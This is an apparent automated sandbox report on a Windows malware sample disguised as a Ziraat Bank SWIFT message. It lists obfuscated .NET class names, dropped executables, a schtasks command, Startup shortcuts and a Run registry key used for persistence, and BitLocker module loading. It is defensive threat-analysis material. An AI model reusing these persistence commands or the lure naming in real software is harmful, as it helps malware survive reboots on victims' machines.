Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.7b60000.5.raw.unpack, hRVwcy3c0vJ6RxqQrd.cs	High entropy of concatenated method names: 'V0hbHtUycq', 'XBFbLkqQCR', 'InnbJd0dD1', 'FNobA1Cn4v', 'nttbSgDDdg', 'Y7AbFjVCds', 'jNMbRYoayC', 'tSFbsQcrp4', 'VhSbu4PRWx', 'bB9bwTqZ6n'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.7b60000.5.raw.unpack, yc6xjCLJ3Dxn5Sfvvk.cs	High entropy of concatenated method names: 'U0xemhUWoP', 'L2BecXLuTX', 'uK1eHv1SrY', 'IeVeLJNQ28', 'dKHer7nMmd', 'm1ie7EQ7aj', 'LmCeC9kxbF', 'bFiePn0r36', 'mMTeqIWX9j', 'YPgevuNM82'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.7b60000.5.raw.unpack, xETUFn0is45a8PXMyu.cs	High entropy of concatenated method names: 'Dispose', 'u77262OCA7', 'JSxIA8Zoln', 'uu1T4emjir', 'Bmb2GSLdOi', 'YFj2z13IED', 'ProcessDialogKey', 'KG9IZ37B2r', 'Tq0I2y11WZ', 'jcAIICcIYR'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.7b60000.5.raw.unpack, JTiYNRJBUVmyl1fEPv.cs	High entropy of concatenated method names: 'PkkdnIWnZx', 'W4Jd0GRPFI', 'T4qdDcrvcn', 'dvNd8wgxjO', 'QmUdT36sa9', 'YSrDfI6DJk', 'tvFDiHhZ5x', 'n8ODay48Z1', 'OqwDXu5MIb', 'kR7D6xcZWL'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.7b60000.5.raw.unpack, tyS5r8zfIB1tmxAaHe.cs	High entropy of concatenated method names: 'rLwvcp2Yxj', 'xdZvHk6sZj', 'HiRvLoPeiw', 'MNmvJmKcqn', 'VaovA23EFr', 'QV4vStDvm3', 'bKOvFg892r', 'ULLvEkZV4c', 'FeevlasDpO', 'mkFvKlbAGp'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.7b60000.5.raw.unpack, qcIYRVGx3rVKFpUFkh.cs	High entropy of concatenated method names: 'pi0veCl4HR', 'isvvDrnBqZ', 'D3yvdo3PiN', 'hMJv8SAhyv', 'bJGvqSg4Nu', 'nQpvTkgwZC', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.7b60000.5.raw.unpack, A37B2r6kq0y11WZ8cA.cs	High entropy of concatenated method names: 'wiLqJnZaJe', 'gtsqAGnSuK', 'F3UqjZewQR', 'c0QqSlUbe8', 'yW5qFFNtFL', 'vdCqQ6GiHh', 'FaKqR9dxB9', 'TH2qsfdZ8r', 's83qyj24At', 'G6wquNEmLx'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.7b60000.5.raw.unpack, uHootK22Sn9Phf7ATCE.cs	High entropy of concatenated method names: 'aHjvGtWfho', 'rKXvziL3pS', 'UW3NZJfndY', 'B0DN29ApKi', 'B0iNI2kSOZ', 'oxJNgxkrb9', 'F2sNOdZ8dq', 'WQmNnVFoMd', 'wNSNhBvxrX', 'qrtN0MJMtU'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.7b60000.5.raw.unpack, H2cJloMJDsacHvfxtu.cs	High entropy of concatenated method names: 'qj5ruKRxxB', 'efyrpX0tE6', 'ETLrMb2DCT', 'YJ0r1PHjJ4', 'bncrAs4Qxv', 'gQ5rjfgRGs', 'OlurSyEnqN', 'kOErF9IxUm', 's9xrQbw8qZ', 'm66rRkyLcM'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.7b60000.5.raw.unpack, XLwmOKB7XehKf3h1ar.cs	High entropy of concatenated method names: 'w6uD9DWlTJ', 'F5mDoLLyt2', 'o2tejJtnPx', 'NQkeSQ2lWV', 'BsHeFZLEhc', 'yTdeQ4glHO', 'cuMeRNUYIs', 'lRCesWAlHo', 'zM2eyGoHgY', 'GPmeurveS2'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.7b60000.5.raw.unpack, l1M1V1IKG4bUeYv2pH.cs	High entropy of concatenated method names: 'GfoxMhpL6', 'FpUmlkgVZ', 'oL3ccca6X', 'UUaoAckIx', 'hX2LDbEi8', 'DkNBtibka', 'tskoFL2hJEAN1cPxsf', 'xRfnVNxhQFcJIGdcHj', 'VrTPPSvuM', 'AG6vRApfi'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.7b60000.5.raw.unpack, mUjmsa2I1wTyhe8yIhQ.cs	High entropy of concatenated method names: 'ToString', 'H5UNHQqoxI', 'Ch7NLbPRf6', 'B4TNBSDA2X', 'zlANJM5EtD', 'pIPNAj1fPv', 'cC0NjgvTQO', 'JTGNSANqjm', 'CVwRDNiQueToARFjGAU', 'LqZ48NiMX6nKpL96t7Y'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.7b60000.5.raw.unpack, JfW2rt2Or6HyynVqDNO.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VdKYqIlrf9', 'R1IYvdYm9V', 'GFdYNfmob9', 'APoYY0a9QH', 'gwyYWJiAed', 'yoxY4Ll6L8', 'JOjYEF0cus'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3d3a030.3.raw.unpack, BHGIUkt33in2GYQkha.cs	High entropy of concatenated method names: 'ub0CVhNWX2', 'DkNC5q3eVY', 'ToString', 'bN3ChgDYXB', 'a5HC0CAuMC', 'qQSCecIfiY', 'tCvCD27PA0', 'J0ZCd8a3MZ', 'qZnC8IO2ar', 'm1xCTTZO9Y'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3d3a030.3.raw.unpack, uD92bqTvUTmybDr5iq.cs	High entropy of concatenated method names: 'Nc7gnRCEaT', 'MltghSlGHb', 'Hnug04gqAr', 'Dmxgev1Y1k', 'AjcgDxgi0N', 'DTZgd7HNds', 'okyg8WsvrN', 'c1VgTbhf8I', 'BwxgUR2RtU', 'hSygVJWQ5P'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3d3a030.3.raw.unpack, WNIyrR2gZbetm9NxXIe.cs	High entropy of concatenated method names: 'akXNGGJost', 'vYnNztoBYZ', 'AlCYZkm6AW', 'y6xQxWibvvBPqlTMRLe', 'I0AMqmigXeMkceQ8Rwq', 't1RGXMivkDxbl3S8hYU', 'EjYxsOizsvWwFACRvp3', 's0tuetNaVwilWEfjvH8'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3d3a030.3.raw.unpack, xJE15a2ZtVofEmWbgZl.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Eu3vw5rhUR', 'lS3vplUc79', 'yo3v3MNwPT', 'cV7vMNncGJ', 'LAtv1J7hQW', 'jlKvkpE5Pf', 'VaovtZTDQh'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3d3a030.3.raw.unpack, PatZtba1OW772OCA79.cs	High entropy of concatenated method names: 'nEgqrNbxuI', 'hCEqCnHCem', 'pOeqqy21ba', 'CROqNCOCwo', 'R5SqWShZpY', 'mZwqExwF6J', 'Dispose', 'HLUPhMxtQB', 'Qy7P0COClX', 'glvPeVideG'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3d3a030.3.raw.unpack, b4e5t9y68J9QyCY9UQ.cs	High entropy of concatenated method names: 'd418lA6Exo', 'UFQ8K9VfVB', 'qYN8xuKgI4', 'jR28m3ftDj', 'ODm89kUuqr', 'rbC8ccLMgH', 'MFj8opvk4V', 'nMq8Hy3Wfn', 'ErW8LuovfW', 'k758BPODK5'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3d3a030.3.raw.unpack, VJtol8RCSbLjFqUjHZ.cs	High entropy of concatenated method names: 'CZn8hvCqMN', 'z628eK0n3L', 'Gyn8dBEVDw', 'lCYdGI3BXH', 'rAqdzGGnGw', 'Dtx8ZGsPGd', 'RRh82OQLQ2', 'ywe8IfKj29', 'rD18gEO3Ak', 'sEZ8OZJV4f'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3d3a030.3.raw.unpack, MISbcKHd5xLHqRIyc7.cs	High entropy of concatenated method names: 'vrf0M1bNZH', 'IP401LCpBA', 'NrO0k7pIYJ', 'DdP0tPiIDc', 'VgV0fmLlMO', 'XPv0ib3Y3x', 'bOY0aEGTil', 'F4L0XHbOXD', 'lTS06UJ5WZ', 'Vw50GEhP9c'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3d3a030.3.raw.unpack, bf5TdtO8PESwqILux8.cs	High entropy of concatenated method names: 'Lls28ISbcK', 'i5x2TLHqRI', 'qJ32VDxn5S', 'Uvv25kXLwm', 'Qh12rarFTi', 'uNR27BUVmy', 'vYnhge9DuvcNS740B1', 'B54PUmFmxk2GAGglKn', 'crU22hIgcn', 'Eoe2gPILOn'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3d3a030.3.raw.unpack, hRVwcy3c0vJ6RxqQrd.cs	High entropy of concatenated method names: 'V0hbHtUycq', 'XBFbLkqQCR', 'InnbJd0dD1', 'FNobA1Cn4v', 'nttbSgDDdg', 'Y7AbFjVCds', 'jNMbRYoayC', 'tSFbsQcrp4', 'VhSbu4PRWx', 'bB9bwTqZ6n'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3d3a030.3.raw.unpack, yc6xjCLJ3Dxn5Sfvvk.cs	High entropy of concatenated method names: 'U0xemhUWoP', 'L2BecXLuTX', 'uK1eHv1SrY', 'IeVeLJNQ28', 'dKHer7nMmd', 'm1ie7EQ7aj', 'LmCeC9kxbF', 'bFiePn0r36', 'mMTeqIWX9j', 'YPgevuNM82'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3d3a030.3.raw.unpack, xETUFn0is45a8PXMyu.cs	High entropy of concatenated method names: 'Dispose', 'u77262OCA7', 'JSxIA8Zoln', 'uu1T4emjir', 'Bmb2GSLdOi', 'YFj2z13IED', 'ProcessDialogKey', 'KG9IZ37B2r', 'Tq0I2y11WZ', 'jcAIICcIYR'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3d3a030.3.raw.unpack, JTiYNRJBUVmyl1fEPv.cs	High entropy of concatenated method names: 'PkkdnIWnZx', 'W4Jd0GRPFI', 'T4qdDcrvcn', 'dvNd8wgxjO', 'QmUdT36sa9', 'YSrDfI6DJk', 'tvFDiHhZ5x', 'n8ODay48Z1', 'OqwDXu5MIb', 'kR7D6xcZWL'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3d3a030.3.raw.unpack, tyS5r8zfIB1tmxAaHe.cs	High entropy of concatenated method names: 'rLwvcp2Yxj', 'xdZvHk6sZj', 'HiRvLoPeiw', 'MNmvJmKcqn', 'VaovA23EFr', 'QV4vStDvm3', 'bKOvFg892r', 'ULLvEkZV4c', 'FeevlasDpO', 'mkFvKlbAGp'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3d3a030.3.raw.unpack, qcIYRVGx3rVKFpUFkh.cs	High entropy of concatenated method names: 'pi0veCl4HR', 'isvvDrnBqZ', 'D3yvdo3PiN', 'hMJv8SAhyv', 'bJGvqSg4Nu', 'nQpvTkgwZC', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3d3a030.3.raw.unpack, A37B2r6kq0y11WZ8cA.cs	High entropy of concatenated method names: 'wiLqJnZaJe', 'gtsqAGnSuK', 'F3UqjZewQR', 'c0QqSlUbe8', 'yW5qFFNtFL', 'vdCqQ6GiHh', 'FaKqR9dxB9', 'TH2qsfdZ8r', 's83qyj24At', 'G6wquNEmLx'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3d3a030.3.raw.unpack, uHootK22Sn9Phf7ATCE.cs	High entropy of concatenated method names: 'aHjvGtWfho', 'rKXvziL3pS', 'UW3NZJfndY', 'B0DN29ApKi', 'B0iNI2kSOZ', 'oxJNgxkrb9', 'F2sNOdZ8dq', 'WQmNnVFoMd', 'wNSNhBvxrX', 'qrtN0MJMtU'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3d3a030.3.raw.unpack, H2cJloMJDsacHvfxtu.cs	High entropy of concatenated method names: 'qj5ruKRxxB', 'efyrpX0tE6', 'ETLrMb2DCT', 'YJ0r1PHjJ4', 'bncrAs4Qxv', 'gQ5rjfgRGs', 'OlurSyEnqN', 'kOErF9IxUm', 's9xrQbw8qZ', 'm66rRkyLcM'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3d3a030.3.raw.unpack, XLwmOKB7XehKf3h1ar.cs	High entropy of concatenated method names: 'w6uD9DWlTJ', 'F5mDoLLyt2', 'o2tejJtnPx', 'NQkeSQ2lWV', 'BsHeFZLEhc', 'yTdeQ4glHO', 'cuMeRNUYIs', 'lRCesWAlHo', 'zM2eyGoHgY', 'GPmeurveS2'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3d3a030.3.raw.unpack, l1M1V1IKG4bUeYv2pH.cs	High entropy of concatenated method names: 'GfoxMhpL6', 'FpUmlkgVZ', 'oL3ccca6X', 'UUaoAckIx', 'hX2LDbEi8', 'DkNBtibka', 'tskoFL2hJEAN1cPxsf', 'xRfnVNxhQFcJIGdcHj', 'VrTPPSvuM', 'AG6vRApfi'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3d3a030.3.raw.unpack, mUjmsa2I1wTyhe8yIhQ.cs	High entropy of concatenated method names: 'ToString', 'H5UNHQqoxI', 'Ch7NLbPRf6', 'B4TNBSDA2X', 'zlANJM5EtD', 'pIPNAj1fPv', 'cC0NjgvTQO', 'JTGNSANqjm', 'CVwRDNiQueToARFjGAU', 'LqZ48NiMX6nKpL96t7Y'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3d3a030.3.raw.unpack, JfW2rt2Or6HyynVqDNO.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VdKYqIlrf9', 'R1IYvdYm9V', 'GFdYNfmob9', 'APoYY0a9QH', 'gwyYWJiAed', 'yoxY4Ll6L8', 'JOjYEF0cus'

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	File created: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	File created: C:\Users\user\AppData\Local\Temp\XClient.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	File created: C:\Users\user\AppData\Local\Temp\build.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File created: C:\Users\user\AppData\Roaming\XClient.exe	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YkxAHNcqEmoeLS" /XML "C:\Users\user\AppData\Local\Temp\tmp89AD.tmp"

Source: C:\Users\user\AppData\Local\Temp\XClient.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
